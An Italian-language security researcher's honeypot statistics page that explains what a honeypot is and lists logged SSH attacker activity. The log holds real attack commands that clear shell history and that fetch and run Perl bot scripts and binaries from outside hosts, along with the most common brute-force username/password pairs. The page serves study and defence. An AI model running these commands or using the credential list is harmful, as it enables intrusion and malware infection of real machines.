ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2018-10-18 04:55:21cd /tmp/lalala14.248.73.250 Vietnam
2018-10-18 04:55:07rm -rf /tmp/lalala ; mkdir /tmp/lalala14.248.73.250 Vietnam
2018-10-18 04:54:51exit14.248.73.250 Vietnam
2018-10-18 03:31:31free -m164.160.28.20 Tanzania, United Republic of
2018-10-18 03:31:25cat /proc/cpuinfo164.160.28.20 Tanzania, United Republic of
2018-10-18 03:31:18ps -x164.160.28.20 Tanzania, United Republic of
2018-10-18 03:31:13uname164.160.28.20 Tanzania, United Republic of
2018-10-18 03:31:08unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;164.160.28.20 Tanzania, United Republic of
2018-10-17 18:43:20uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp/;cd /tmp/;chattr -uais *;rm -rf y.txt;wget http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt w.txt;perl w.txt 162.243.233.156;lwp-download http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt lw.txt;perl lw.txt 162.243.233.156;fetch http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt fe.txt;perl fe.txt 162.243.233.156;curl -O http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt cu.txt;perl cu.txt 162.243.233.156;rm -rf w.txt fe.txt cu.txt lw.txt y.txt y.txt*;178.19.130.191 France
2018-10-17 18:26:00uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp/;cd /tmp/;chattr -uais *;rm -rf y.txt;wget http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt w.txt;perl w.txt 162.243.233.156;lwp-download http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt lw.txt;perl lw.txt 162.243.233.156;fetch http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt fe.txt;perl fe.txt 162.243.233.156;curl -O http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt cu.txt;perl cu.txt 162.243.233.156;rm -rf w.txt fe.txt cu.txt lw.txt y.txt y.txt*;128.199.157.152 Singapore
2018-10-17 18:20:48free -m88.12.9.113 Spain
2018-10-17 18:20:43cat /proc/cpuinfo88.12.9.113 Spain
2018-10-17 18:20:37ps -x88.12.9.113 Spain
2018-10-17 18:20:32uname88.12.9.113 Spain
2018-10-17 18:20:27unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;88.12.9.113 Spain
2018-10-17 16:50:39free -m185.244.25.177 Netherlands
2018-10-17 16:50:34cat /proc/cpuinfo185.244.25.177 Netherlands
2018-10-17 16:50:28ps -x185.244.25.177 Netherlands
2018-10-17 16:50:24uname185.244.25.177 Netherlands
2018-10-17 16:50:20unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;185.244.25.177 Netherlands
2018-10-17 15:22:36free -m185.234.217.21 Ireland
2018-10-17 15:22:31cat /proc/cpuinfo185.234.217.21 Ireland
2018-10-17 15:22:26uname185.234.217.21 Ireland
2018-10-17 15:22:21killall -9 perl;cd /var/tmp/ ; cd /tmp/ ; rm -rf ssh1.txt ; wget http://185.234.217.21/ssh1.txt ; mv ssh1.txt wget.txt ; perl wget.txt 193.169.252.253 ; lwp-download http://185.234.217.21/ssh1.txt ; mv ssh1.txt lynx.txt ; perl lynx.txt 193.169.252.253 ; fetch http://185.234.217.21/ssh1.txt ; mv ssh1.txt fetch.txt ; perl fetch.txt 193.169.252.253 ; curl -O http://185.234.217.21/ssh1.txt ; mv ssh1.txt curl.txt ; perl curl.txt 193.169.252.253 ; rm -rf ssh1.txt wget.txt lynx.txt fetch.txt curl.txt185.234.217.21 Ireland
2018-10-17 14:50:39free -m185.234.217.21 Ireland
2018-10-17 14:50:33cat /proc/cpuinfo185.234.217.21 Ireland
2018-10-17 14:50:28uname185.234.217.21 Ireland
2018-10-17 14:50:24killall -9 perl;cd /var/tmp/ ; cd /tmp/ ; rm -rf ssh1.txt ; wget http://185.234.217.21/ssh1.txt ; mv ssh1.txt wget.txt ; perl wget.txt 193.169.252.253 ; lwp-download http://185.234.217.21/ssh1.txt ; mv ssh1.txt lynx.txt ; perl lynx.txt 193.169.252.253 ; fetch http://185.234.217.21/ssh1.txt ; mv ssh1.txt fetch.txt ; perl fetch.txt 193.169.252.253 ; curl -O http://185.234.217.21/ssh1.txt ; mv ssh1.txt curl.txt ; perl curl.txt 193.169.252.253 ; rm -rf ssh1.txt wget.txt lynx.txt fetch.txt curl.txt185.234.217.21 Ireland
2018-10-17 14:09:36ls -la /var/run/gcc.pid198.1.188.107 China
2018-10-17 14:09:32#!/bin/sh\
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\
wget http://198.1.188.107/g3308l\
curl -O http://198.1.188.107/g3308l\
chmod +x g3308l\
./g3308l\
198.1.188.107
2018-10-17 11:12:50echo Hi | cat -n124.12.161.194 Taiwan
2018-10-17 11:12:45ps -ef | grep '[Mm]iner'124.12.161.194 Taiwan
2018-10-17 11:12:39ps | grep '[Mm]iner'124.12.161.194 Taiwan
2018-10-17 11:12:33cat /proc/cpuinfo124.12.161.194 Taiwan
2018-10-17 11:12:28uname -a124.12.161.194 Taiwan
2018-10-17 11:12:23ifconfig124.12.161.194 Taiwan
2018-10-17 11:12:07/ip cloud print124.12.161.194 Taiwan
2018-10-17 11:12:07/ip cloud print124.12.161.194 Taiwan
2018-10-17 07:39:49free -m192.119.69.82 United States
2018-10-17 07:39:43cat /proc/cpuinfo192.119.69.82 United States
2018-10-17 07:39:37ps -x192.119.69.82 United States
2018-10-17 07:39:33uname192.119.69.82 United States
2018-10-17 07:39:28unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;192.119.69.82 United States
2018-10-17 07:07:15ls -la /var/run/gcc.pid198.1.188.107 China
2018-10-17 07:07:10#!/bin/sh\
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\
wget http://198.1.188.107/g3308l\
curl -O http://198.1.188.107/g3308l\
chmod +x g3308l\
./g3308l\
198.1.188.107
2018-10-17 05:16:53cat >/tmp/.xs/daemon.armv4l.mod94.213.132.65 Netherlands
2018-10-17 05:16:49mkdir /tmp/.xs/94.213.132.65 Netherlands
2018-10-17 05:13:15cat >/tmp/.xs/daemon.armv4l.mod94.213.132.65 Netherlands
2018-10-17 05:13:10mkdir /tmp/.xs/94.213.132.65 Netherlands
2018-10-17 05:13:00cat /proc/version94.213.132.65 Netherlands
×
Last 20 sessions
DateSource
2018-11-15 02:53:58150.138.183.254 China
2018-11-15 02:51:365.101.40.100 Russian Federation
2018-11-15 02:40:355.101.40.100 Russian Federation
2018-11-15 02:39:23193.169.252.230
2018-11-15 02:37:54150.138.183.254 China
2018-11-15 02:29:335.101.40.100 Russian Federation
2018-11-15 02:21:48150.138.183.254 China
2018-11-15 02:18:375.101.40.100 Russian Federation
2018-11-15 02:14:01171.224.234.36 Vietnam
2018-11-15 02:14:01171.224.234.36 Vietnam
2018-11-15 02:07:345.101.40.100 Russian Federation
2018-11-15 02:05:26150.138.183.254 China
2018-11-15 01:56:355.101.40.100 Russian Federation
2018-11-15 01:49:15150.138.183.254 China
2018-11-15 01:43:01193.169.252.228
2018-11-15 01:37:305.101.40.166 Russian Federation
2018-11-15 01:33:05150.138.183.254 China
2018-11-15 01:29:21171.224.234.36 Vietnam
2018-11-15 01:29:21171.224.234.36 Vietnam
2018-11-15 01:26:305.101.40.166 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
12994 adminadmin123
1255 admin
1100 adminaerohive
741 ubntubnt
215 adminadmin
121 useruser
119 rootroot
118 rootCactiEZ
115 rootadmin
101 piraspberry
98 root!@
82 piraspberryraspberry993311
75 root
74 adminpassword
69 supportsupport
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
1359195.3.147.49 Latvia
706193.201.224.206 Ukraine
200178.19.130.191 France
1685.188.10.76 Croatia
16745.225.35.253 Brazil
1545.196.76.41 France
15338.84.132.236 United States
141159.203.36.38 Canada
116109.236.91.85 Netherlands
103128.199.157.152 Singapore
10254.37.235.210 Poland
79117.4.114.178 Vietnam
77194.63.141.141 Russian Federation
77116.31.116.28 China
73167.114.210.108 Canada
6013.58.243.139 United States
5962.244.196.50 Turkey
57204.12.206.98 United States
555.188.87.52 Russian Federation
555.188.87.51 Russian Federation
×
TOP 20 attackers
ConnectionsSource
23855.101.40.150 Russian Federation
2322150.138.183.254 China
18265.101.40.172 Russian Federation
16165.101.40.149 Russian Federation
1416195.3.147.49 Latvia
140154.175.87.142 United States
1174182.61.56.5 China
11465.101.40.101 Russian Federation
1064111.231.66.173 China
10385.101.40.100 Russian Federation
957171.231.51.180 Vietnam
953146.0.77.128 Netherlands
913146.0.77.173 Netherlands
8305.101.40.106 Russian Federation
790192.187.103.6 United States
759192.187.103.5 United States
758192.187.103.3 United States
729193.201.224.206 Ukraine
723173.208.192.22 United States
7185.101.40.159 Russian Federation

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!